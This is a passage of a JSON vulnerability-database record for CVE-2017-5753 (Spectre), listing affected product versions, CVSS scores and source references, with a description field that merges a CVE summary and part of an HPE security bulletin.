      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.449.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.142"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.911.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.4"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.72"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.497.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.576.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1015.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.795.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.87"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "42.0.2311.90"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.213"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1010.2"
      },
      {
        "_id": null,
        "model": "vsphere integrated containers",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.3.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.12"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.148"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.18"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1682.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.99"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.751.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.636.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.91"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.313"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.5"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.114"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.64"
      },
      {
        "_id": null,
        "model": "windows for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "100"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1670.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.456.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.12"
      },
      {
        "_id": null,
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.47"
      },
      {
        "_id": null,
        "model": "communications lsms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "13.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.831.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.38"
      },
      {
        "_id": null,
        "model": "innova",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.111"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.67"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.550.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.583.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.317.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.595.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1009"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.131"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.108"
      },
      {
        "_id": null,
        "model": "proliant dl385 gen10 server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.02"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.3.154.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.94"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.866.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.34"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "52.0.2743.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1673.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.35"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.101"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.72"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.131"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.128"
      },
      {
        "_id": null,
        "model": "enterprise linux server year extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-47.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.653.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1656.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "48.0.2564.92"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.92"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.713.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.643.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1057.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.228"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.144"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.5"
      },
      {
        "_id": null,
        "model": "bactec",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "9120/92400"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.504.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.767.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1292.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1058.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.75"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.129"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.21"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.218"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.68"
      },
      {
        "_id": null,
        "model": "windows version for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1016070"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.359.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.205"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.83"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.78"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.1.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.565.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.567.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.2.2"
      },
      {
        "_id": null,
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.37586"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.238"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.98"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.656.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1011"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.66"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1033.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.788.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.691.0"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "BID",
        "id": "102371"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "145717"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "145721"
      },
      {
        "db": "PACKETSTORM",
        "id": "145658"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      }
    ],
    "trust": 0.5
  },
  "cve": "CVE-2017-5753",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "CVE-2017-5753",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.0,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "CNVD-2018-00304",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.4,
            "id": "VHN-113956",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.6,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.1,
            "id": "CVE-2017-5753",
            "impactScore": 4.0,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2017-5753",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-00304",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-113956",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "Systems with microprocessors utilizing speculative execution and branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis. Two vulnerabilities are identified, known as \"Variant 3a\" and \"Variant 4\". CPUhardware is a set of firmware that runs in the CPU (Central Processing Unit) for managing and controlling the CPU. The Meltdown vulnerability exists in the CPU processor core, which \\\"melts\\\" the security boundary implemented by hardware, allowing low-privileged user-level applications to \\\"cross-border\\\" access to system-level memory, causing data leakage. Multiple CPU Hardware are prone to an information-disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may aid in further attacks. The following products and versions are affected: ARM Cortex-R7; Cortex-R8; Cortex-A8; Cortex-A9; Cortex-A12; Xeon CPU E5-1650 v3, v2, v4; Xeon E3-1265l v2, v3, v4 ; Xeon E3-1245 v2, v3, v5, v6 versions; Xeon X7542, etc. Relevant releases/architectures:\n\nRHEL 7-based RHEV-H ELS - noarch\nRHEV Hypervisor for RHEL-6 ELS - noarch\n\n3. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03805en_us\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: hpesbhf03805en_us\nVersion: 5\n\nHPESBHF03805 rev.5 - Certain HPE products using Microprocessors from Intel,\nAMD, and ARM, with Speculative Execution, Elevation of Privilege and\nInformation Disclosure. \n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2018-01-18\nLast Updated: 2018-01-17\n\nPotential Security Impact: Local: Disclosure of Information, Elevation of\nPrivilege\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nOn January 3 2018, side-channel security vulnerabilities involving\nspeculative execution were publicly disclosed. These vulnerabilities may\nimpact the listed HPE products, potentially leading to information disclosure\nand elevation of privilege. Mitigation and resolution of these\nvulnerabilities may call for both an operating system update, provided by the\nOS vendor, and a system ROM update from HPE. \n\n\n**Note:**\n\n  * This issue takes advantage of techniques commonly used in many modern\nprocessor architectures.  \n  * For further information, microprocessor vendors have provided security\nadvisories:\n  \n    - Intel:\n\u003chttps://security-center.intel.com/advisory.aspx?intelid=intel-sa-00088\u0026langu\ngeid=en-fr\u003e\n    - AMD: \u003chttp://www.amd.com/en/corporate/speculative-execution\u003e\n    - ARM: \u003chttps://developer.arm.com/support/security-update\u003e\n\nReferences:\n\n  - PSRT110635\n  - PSRT110634\n  - PSRT110633\n  - PSRT110632\n  - CVE-2017-5715 - aka Spectre, branch target injection\n  - CVE-2017-5753 - aka Spectre,  bounds check bypass\n  - CVE-2017-5754 - aka  Meltdown,  rogue data cache load, memory access\npermission check performed after kernel memory read\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n  - HPE ProLiant DL380 Gen10 Server prior to v1.28\n  - HPE ProLiant DL180 Gen10 Server prior to v1.28\n  - HPE ProLiant DL160 Gen10 Server prior to v1.28\n  - HPE ProLiant DL360 Gen10 Server prior to v1.28\n  - HPE ProLiant ML110 Gen10 Server prior to v1.28\n  - HPE ProLiant DL580 Gen10 Server prior to v1.28\n  - HPE ProLiant DL560 Gen10 Server prior to v1.28\n  - HPE ProLiant DL120 Gen10 Server prior to v1.28\n  - HPE ProLiant ML350 Gen10 Server prior to v1.28\n  - HPE ProLiant XL450 Gen10 Server prior to v1.28\n  - HPE Synergy 660 Gen10 Compute Module prior to v1.28\n  - HPE ProLiant XL170r Gen10 Server prior to v1.28\n  - HPE ProLiant BL460c Gen10 Server Blade prior to v1.28\n  - HPE ProLiant XL190r Gen10 Server prior to v1.28\n  - HPE ProLiant XL230k Gen10 Server prior to v1.28\n  - HPE ProLiant DL385 Gen10 Server prior to v1.04\n  - HPE Synergy 480 Gen10 Compute Module prior to v1.28\n  - HPE ProLiant ML350 Gen10 Server prior to v1.28\n  - HPE ProLiant XL730f Gen9 Server To be delivered\n  - HPE ProLiant XL230a Gen9 Server To be delivered\n  - HPE ProLiant XL740f Gen9 Server To be delivered\n  - HPE ProLiant XL750f Gen9 Server To be delivered\n  - HPE ProLiant XL170r Gen9 Server To be delivered\n  - HP ProLiant DL60 Gen9 Server To be delivered\n  - HPE ProLiant XL450 Gen9 Server To be delivered\n  - HP ProLiant DL160 Gen9 Server To be delivered\n  - HPE Apollo 4200 Gen9 Server To be delivered\n  - HP ProLiant BL460c Gen9 Server Blade To be delivered\n  - HP 